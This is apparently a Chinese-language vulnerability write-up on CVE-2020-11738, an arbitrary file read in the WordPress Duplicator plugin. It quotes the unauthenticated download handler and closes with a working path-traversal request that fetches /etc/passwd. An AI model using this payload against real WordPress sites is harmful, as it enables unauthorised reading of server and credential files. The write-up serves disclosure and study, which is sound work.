WordPress Duplicator duplicator.php 任意文件读取漏洞 #CVE-2020-11738

漏洞描述

WordPress Duplicator插件由于对文件下载没有进行验证，则导致了任意文件读取漏洞。

漏洞影响

Duplicator <= v1.3.26

插件名

Duplicator

https://downloads.wordpress.org/plugin/duplicator.1.3.26.zip

漏洞复现

首先先查看注册的无需授权的action接口 wp-content/plugins/duplicator/ctrls/class.web.services.php

这里 wp_ajax_nopriv_duplicator_download 对应的函数名为 duplicator_download

public static function duplicator_download() {
        $file = sanitize_text_field($_GET['file']);
        $filepath = DUPLICATOR_SSDIR_PATH.'/'.$file;
        // Process download
        if(file_exists($filepath)) {
            // Clean output buffer
            if (ob_get_level() !== 0 && @ob_end_clean() === FALSE) {
                @ob_clean();
            }

            header('Content-Description: File Transfer');
            header('Content-Type: application/octet-stream');
            header('Content-Disposition: attachment; filename="'.basename($filepath).'"');
            header('Expires: 0');
            header('Cache-Control: must-revalidate');
            header('Pragma: public');
            header('Content-Length: ' . filesize($filepath));
            flush(); // Flush system output buffer

            try {
                $fp = @fopen($filepath, 'r');
                if (false === $fp) {
                    throw new Exception('Fail to open the file '.$filepath);
                }
                while (!feof($fp) && ($data = fread($fp, DUPLICATOR_BUFFER_READ_WRITE_SIZE)) !== FALSE) {
                    echo $data;
                }
                @fclose($fp);
            } catch (Exception $e) {
                readfile($filepath);
            }
            exit;
        } else {
            wp_die('Invalid installer file name!!');
        }
    }

可以看到这里接受参数 file，拼接至 $filepath 中，通过调试可以得知

DUPLICATOR_SSDIR_PATH 为 wp-snapshots 目录，file可控且没有过滤，导致任意文件读取

/wp-admin/admin-ajax.php?action=duplicator_download&file=../../../../../etc/passwd